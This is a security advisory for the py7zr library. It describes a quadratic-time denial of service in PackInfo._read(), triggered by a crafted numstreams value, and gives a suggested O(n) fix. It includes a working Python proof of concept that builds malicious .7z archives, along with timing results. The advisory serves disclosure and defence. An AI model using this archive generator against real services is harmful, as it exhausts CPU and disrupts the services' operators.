GHSA-h4gh-22qq-72r7Medium

py7zr: O(n^2) algorithmic complexity DoS in PackInfo._read()

Published
June 19, 2026
Last Modified
June 19, 2026

🔗 CVE IDs covered (1)

📋 Description

Summary

PackInfo._read() uses an O(n^2) cumulative sum pattern where numstreams is read directly from the archive header. A crafted .7z archive with a large numstreams value causes excessive CPU consumption during SevenZipFile.init() — no extraction is needed. A 50 KB archive takes ~7 seconds of CPU time.

Details

The vulnerable code is in PackInfo._read() (archiveinfo.py):

self.packpositions = [sum(self.packsizes[:i]) for i in range(self.numstreams + 1)]

numstreams is parsed from the archive header via read_uint64() and is attacker-controlled. Each sum(self.packsizes[:i]) re-sums from the beginning, producing O(n^2) total work. This runs during header parsing in SevenZipFile.init(), before any extraction.

Suggested fix — replace with O(n) cumulative sum:

from itertools import accumulate self.packpositions = [0] + list(accumulate(self.packsizes))

PoC

  import py7zr
  from py7zr.archiveinfo import write_uint64, PROPERTY

  MAGIC = b'\x37\x7a\xbc\xaf\x27\x1c'

  def encode_uint64(v):
      buf = io.BytesIO()
      write_uint64(buf, v)
      return buf.getvalue()

  def build_7z_with_streams(numstreams):
      header = io.BytesIO()
      header.write(PROPERTY.HEADER)
      header.write(PROPERTY.MAIN_STREAMS_INFO)
      header.write(PROPERTY.PACK_INFO)
      header.write(encode_uint64(0))
      header.write(encode_uint64(numstreams))
      header.write(PROPERTY.SIZE)
      for _ in range(numstreams):
          header.write(encode_uint64(1))
      header.write(PROPERTY.END)
      header.write(PROPERTY.END)
      header.write(PROPERTY.END)
      header_data = header.getvalue()

      out = io.BytesIO()
      out.write(MAGIC)
      out.write(b'\x00\x04')
      next_crc = binascii.crc32(header_data) & 0xFFFFFFFF
      start_header = (struct.pack('<Q', 0)
                      + struct.pack('<Q', len(header_data))
                      + struct.pack('<I', next_crc))
      out.write(struct.pack('<I', binascii.crc32(start_header) &
  0xFFFFFFFF))
      out.write(start_header)
      out.write(header_data)
      return out.getvalue()

  for n in [1000, 5000, 10000, 30000, 50000]:
      archive = build_7z_with_streams(n)
      start = time.time()
      try:
          with py7zr.SevenZipFile(io.BytesIO(archive), 'r') as z:
              pass
      except Exception:
          # The crafted archive may later raise due to being malformed,
          # but the quadratic work has already been performed during
          # header parsing in SevenZipFile.__init__().
          pass
      elapsed = time.time() - start
      print(f"n={n:6d}  size={len(archive):8d} bytes
  time={elapsed:.3f}s")

Tested on py7zr 1.1.0, Python 3.12.3, Linux x86_64.

Results:

n= 1000 size= 1042 bytes time=0.004s n= 5000 size= 5042 bytes time=0.071s n= 10000 size= 10042 bytes time=0.291s n= 30000 size= 30043 bytes time=2.609s n= 50000 size= 50043 bytes time=7.097s

Impact

Denial of Service. Any application that opens .7z archives from untrusted sources using py7zr.SevenZipFile() can be caused to consume excessive CPU time with a small crafted archive. The quadratic cost occurs during header parsing, before any content extraction.

🎯 Affected products1

  • pip/py7zr:<= 1.1.2

🔗 References (3)